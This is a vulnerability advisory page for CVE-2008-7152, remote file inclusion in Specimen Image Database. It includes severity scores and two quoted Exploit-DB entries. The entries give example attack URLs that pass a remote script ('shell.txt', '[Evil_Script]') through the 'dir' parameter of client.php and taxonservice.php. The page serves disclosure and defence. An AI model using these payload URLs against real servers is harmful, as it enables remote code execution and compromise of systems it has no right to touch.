CVE-2008-7152
published 2009-09-01CVE-2008-7152: Multiple PHP remote file inclusion vulnerabilities in Specimen Image Database (SID), when register_globals is enabled, allow remote attackers to execute…
PriorityP339medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.92%
77.4th percentile
Multiple PHP remote file inclusion vulnerabilities in Specimen Image Database (SID), when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the dir parameter to (1) client.php or (2) taxonservice.php.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Specimen Image Database - 'taxonservice.php?dir' Remote File Inclusion
exploitdb·2008-03-07
CVE-2008-7152 Specimen Image Database - 'taxonservice.php?dir' Remote File Inclusion
Specimen Image Database - 'taxonservice.php?dir' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/28142/info
SID (Specimen Image Database) is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/SID_box_notns_path/taxonservice.php?dir=shell.txt?
Exploit-DB
Specimen Image Database - 'client.php' Remote File Inclusion
exploitdb·2006-10-16
CVE-2008-7152 Specimen Image Database - 'client.php' Remote File Inclusion
Specimen Image Database - 'client.php' Remote File Inclusion
---
SID - [dir] Remote File Include Vulnerability
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : SID
URL : http://sid.zoology.gla.ac.uk/SID_box_notns.zip
Exploit:
~~~~~~~
Variable $dir not sanitized.When register_globals=on an attacker ca
n exploit this vulnerability with a simple php injection script.
# http://www.site.com/[path]/client.php?dir=[Evil_Script]
Shoutz:
~~~~~~
# Greetz to [Oo], str0ke, th0r, RST TEAM: [ !_30, darkking, DarkWizzard, Elias, Icarius, MiniDisc, Nemessis, Shocker, SpiridusuCaddy and sysghost !]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net
No writeups or analysis indexed.
2009-09-01
Published